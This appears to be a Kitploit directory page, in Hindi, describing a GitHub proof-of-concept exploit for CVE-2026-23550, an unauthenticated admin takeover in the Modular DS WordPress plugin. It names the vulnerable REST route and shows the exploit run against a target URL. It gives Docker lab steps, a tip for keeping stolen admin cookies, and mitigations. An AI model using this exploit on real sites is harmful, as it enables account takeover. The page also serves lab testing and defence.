Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/thetorjancaptain/cve-2026-23550-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubthetorjancaptain/cve-2026-23550-poc

CVE-2026-23550-PoC

CVE-2026-23550 - Modular DS WordPress प्लगइन **अप्रमाणित व्यवस्थापक पहुंच**

रिपॉजिटरी देखें
17 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-23550-PoC

CVE-2026-23550 - Modular DS WordPress प्लगइन अप्रमाणित एडमिन एक्सेस

Status CVSS Affected

प्रूफ-ऑफ-कॉन्सेप्ट (PoC) जो CVE-2026-23550 को प्रदर्शित करता है - Modular DS WordPress प्लगइन (संस्करण ≤2.5.1) में गंभीर अप्रमाणित एडमिन खाता अधिग्रहण। वास्तविक दुनिया में सक्रिय रूप से शोषित।

PoC Flow

हमले का सारांश: /api/modular-connector/login में दोषपूर्ण REST API रूटिंग जब होता है तो WordPress प्रमाणीकरण को बायपास कर देता है, जिससे अप्रमाणित एडमिन सत्र कुकीज़ प्रदान होती हैं।

origin=mo

🚀 त्वरित डेमो - यदि आपके पास WP पहले से सेट है

root@kitploit:~
# प्रोडक्शन-रेडी PoC
./CVE-2026-23550-PoC.sh http://target.com

आउटपुट:

root@kitploit:~
[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VULNERABLE: Admin session cookie issued

तकनीकी नोट:

प्रभावित REST एंडपॉइंट केवल ?rest_route= तंत्र के माध्यम से सुलभ है; /wp-json/ के माध्यम से सीधी पहुंच उपलब्ध नहीं हो सकती है। यह भेद्यता बिना क्रेडेंशियल या नॉन्स सत्यापन के अप्रमाणित पहुंच की अनुमति देती है। WordPress एडमिनिस्ट्रेटर सत्र कुकी का सफल जारी होना शोषण की पुष्टि माना जाता है। यह प्रूफ-ऑफ-कॉन्सेप्ट कोई प्रशासनिक कार्रवाई नहीं करता है। परीक्षण के दौरान Modular DS संस्करण 2.5.0 का उपयोग किया जाता है।


⚙️ पुनरुत्पादन के चरण:

चरण 1: लैब निर्देशिका

root@kitploit:~
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp

चरण 2: Docker Compose

root@kitploit:~
version: "3.9"

services:
  db:
    image: mysql:8.0
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: rootpass
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wpuser
      MYSQL_PASSWORD: wppass
    volumes:
      - db_data:/var/lib/mysql

  wordpress:
    image: wordpress:6.4.3-php8.2-apache
    depends_on:
      - db
    ports:
      - "8080:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wpuser
      WORDPRESS_DB_PASSWORD: wppass
      WORDPRESS_DB_NAME: wordpress
    volumes:
      - wp_data:/var/www/html

volumes:
  db_data:
  wp_data:

चरण 3: तैनाती

root@kitploit:~
docker compose up -d
docker compose logs -f db

प्रतीक्षा करें: "ready for connections"

चरण 4: WordPress इंस्टॉलेशन

  • URL: http://localhost:8080
  • एडमिन उपयोगकर्ता: admin
  • पासवर्ड: admin123
  • साइट शीर्षक: कुछ भी

चरण 5: REST सत्यापित करें (महत्वपूर्ण)

root@kitploit:~
curl http://localhost:8080/?rest_route=/

अपेक्षित:

root@kitploit:~
{
  "name": "...",
  "namespaces": [...]
}

यदि यह विफल होता है → रुकें, वातावरण टूटा हुआ है।

चरण 6: भेद्य प्लगइन इंस्टॉल करें

root@kitploit:~
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip

WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/

docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
  /var/www/html/wp-content/plugins/modular-connector

चरण 7: प्लगइन सक्रिय करें

  • http://localhost:8080/wp-admin/plugins.php
  • Modular Connector सक्रिय करें
  • ऑनबोर्डिंग संकेतों को अनदेखा करें

चरण 8: शोषण

root@kitploit:~
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/

नोट: यदि आप कुकीज़ को टेक्स्ट फ़ाइल में चाहते हैं तो poc.sh फ़ाइल से "rm -f "$COOKIE_JAR"" हटा दें।

🛡️ शमन

  • तत्काल: Modular DS प्लगइन निष्क्रिय करें
  • पैच: 2.5.2+ में अपग्रेड करें
  • ऑडिट: अनधिकृत एडमिन उपयोगकर्ताओं की जांच करें
  • WAF: ?rest_route=/api/modular-connector/login ब्लॉक करें

📄 लाइसेंस

MIT लाइसेंस - केवल सुरक्षा अनुसंधान और अधिकृत पेंटेस्टिंग के लिए। दुर्भावनापूर्ण उपयोग के लिए नहीं। जिम्मेदारी से खुलासा करें।

🚨 कानूनी नोटिस

यह PoC केवल अधिकृत सुरक्षा परीक्षण के लिए है। प्रोडक्शन सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है। निष्कर्षों की सूचना प्लगइन अनुरक्षकों को दें।

टूल डाउनलोड करें